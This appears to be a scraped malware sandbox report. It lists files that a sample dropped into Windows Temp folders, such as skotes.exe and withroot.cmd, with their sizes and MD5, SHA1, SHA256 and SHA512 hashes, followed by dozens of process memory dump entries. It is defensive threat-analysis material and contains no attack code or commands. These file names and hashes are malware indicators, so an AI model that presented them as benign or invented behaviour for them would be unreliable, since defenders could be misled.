Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
cfbb28daf62bfaa9f2c408ee6f0e7d7e

SHA1
b5e3805f88282d30fb28d2c66431dd2beec975e6

SHA256
b4215e662e52a18a2a94b715d67b2a0eb353657fe9c34f0259007fbeba8e657d

SHA512
154619491e6a3b7f24a0557c8a32189c6944efad9726e2b695a204caf736e8587c14a7ed568f75068e52022123e2581d20d730be28d4988431c5bd72a82c2186

Download Submit
C:\Users\Admin\AppData\Local\Temp\1011339001\vvcWObH.exe

Filesize
560KB

MD5
197feb829312be2d9505c1492b6ddd16

SHA1
4e521c36e4fd6c7755d93f8281cc028a980b0979

SHA256
2a08227ca39953cd8f967682f4f101f8debdc323b63b37aa1e9ddc38b9009a12

SHA512
fa9b18fb32f2892a4844fcf3d29823c1375daca8b3c46ce2dd048e3b11ff2ba2acf6ef73c38e57d16712e75304c8961cf7f2dee4213dc10798f645f9d59c8cb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd

Filesize
1.3MB

MD5
29af8022a96a28b92c651b245328807e

SHA1
6e757f60f7e00907841b0c5069e188864c52ba97

SHA256
364ff03993e1386203beb1f56e9be2fec932a7ce15e7ccb10ed045926bcda954

SHA512
5a086ed9f0921084aaa4d3ac113a190b3d1354c0069ff86162d751af881379590e9946bbe0d0fa3f7f9425fe1ad7959569090db31f5f596fd1dc249206f4403d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe

Filesize
1.9MB

MD5
046233032238246b01f8db289d51c34c

SHA1
814b41c50c238de914925bd2aa25b9c8455e0ad6

SHA256
3ac545427f6607eed1dac90dcbd69cb41652210b046cd71f885c9a55ec30020e

SHA512
d902a14b34bc5bd5b8e374fcb1293c6cd2156e635ee83a7b2d162b5be1ea10488540cb8dcdbffbf94c560576fd8ee94e7cdb68995203db07309b4ee6da66e63e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab1861.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

Filesize
1.8MB

MD5
9ee9fc91594ff0d745d83ae3ede6c725

SHA1
27ca7f96db3ed74658fc89ca6d33db35c59d8a77

SHA256
5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7

SHA512
bf7d5e625fbe7adb3d1bbdc60d9263a8bb3cc000f6053033ae1ea786f7a657e5012f0f0946835b18622313e6b0f298b0e1e7aa29329f89a9f45ad440220fccef

Download Submit
memory/288-42-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/288-40-0x0000000000A10000-0x0000000000AA2000-memory.dmp

Filesize
584KB

Download
memory/288-41-0x000000001A730000-0x000000001A7D0000-memory.dmp

Filesize
640KB

Download
memory/288-45-0x0000000000660000-0x000000000067E000-memory.dmp

Filesize
120KB

Download
memory/288-44-0x0000000000650000-0x0000000000658000-memory.dmp

Filesize
32KB

Download
memory/288-43-0x0000000000430000-0x000000000043A000-memory.dmp

Filesize
40KB

Download
memory/1956-68-0x0000000001D70000-0x0000000001DCC000-memory.dmp

Filesize
368KB

Download
memory/1956-50-0x0000000000380000-0x000000000038A000-memory.dmp

Filesize
40KB

Download
memory/1956-69-0x0000000000380000-0x000000000038A000-memory.dmp

Filesize
40KB

Download
memory/1956-66-0x0000000001D70000-0x0000000001DCC000-memory.dmp

Filesize
368KB

Download
memory/1956-67-0x0000000001D70000-0x0000000001DCC000-memory.dmp

Filesize
368KB

Download
memory/1956-70-0x0000000000520000-0x000000000054A000-memory.dmp

Filesize
168KB

Download
memory/1956-64-0x00000000004A0000-0x00000000004AA000-memory.dmp

Filesize
40KB

Download
memory/1956-65-0x00000000004A0000-0x00000000004AA000-memory.dmp

Filesize
40KB

Download
memory/1956-48-0x0000000000380000-0x000000000038A000-memory.dmp

Filesize
40KB

Download
memory/1956-72-0x0000000000380000-0x000000000038A000-memory.dmp

Filesize
40KB

Download
memory/1956-71-0x0000000000520000-0x000000000054A000-memory.dmp

Filesize
168KB

Download
memory/2380-18-0x00000000069E0000-0x0000000006E9F000-memory.dmp

Filesize
4.7MB

Download
memory/2380-3-0x0000000000FC0000-0x000000000147F000-memory.dmp

Filesize
4.7MB

Download
memory/2380-2-0x0000000000FC1000-0x0000000000FEF000-memory.dmp

Filesize
184KB

Download
memory/2380-1-0x0000000077110000-0x0000000077112000-memory.dmp

Filesize
8KB

Download
memory/2380-0-0x0000000000FC0000-0x000000000147F000-memory.dmp

Filesize
4.7MB

Download
memory/2380-20-0x00000000069E0000-0x0000000006E9F000-memory.dmp

Filesize
4.7MB

Download
memory/2380-17-0x0000000000FC0000-0x000000000147F000-memory.dmp

Filesize
4.7MB

Download
memory/2380-4-0x0000000000FC0000-0x000000000147F000-memory.dmp

Filesize
4.7MB

Download
memory/2536-152-0x0000000000080000-0x000000000008A000-memory.dmp

Filesize
40KB

Download
memory/2580-74-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-84-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-47-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-22-0x0000000000131000-0x000000000015F000-memory.dmp

Filesize
184KB

Download
memory/2580-75-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-76-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-77-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-78-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-79-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-80-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-81-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-82-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-83-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-49-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-85-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-46-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-26-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-102-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-24-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-23-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-21-0x0000000000130000-0x00000000005EF000-memory.dmp

Filesize
4.7MB

Download
memory/2580-143-0x0000000006B90000-0x0000000007058000-memory.dmp

Filesize
4.8MB

Download
memory/2580-145-0x0000000006B90000-0x0000000007058000-memory.dmp

Filesize
4.8MB

Download
memory/2888-146-0x0000000004C70000-0x0000000005070000-memory.dmp

Filesize
4.0MB

Download
memory/2888-144-0x00000000009F0000-0x0000000000EB8000-memory.dmp

Filesize
4.8MB

Download
memory/2888-150-0x0000000075540000-0x0000000075587000-memory.dmp

Filesize
284KB

Download
memory/2888-148-0x0000000076F20000-0x00000000770C9000-memory.dmp

Filesize
1.7MB

Download
memory/2888-147-0x0000000004C70000-0x0000000005070000-memory.dmp

Filesize
4.0MB

Download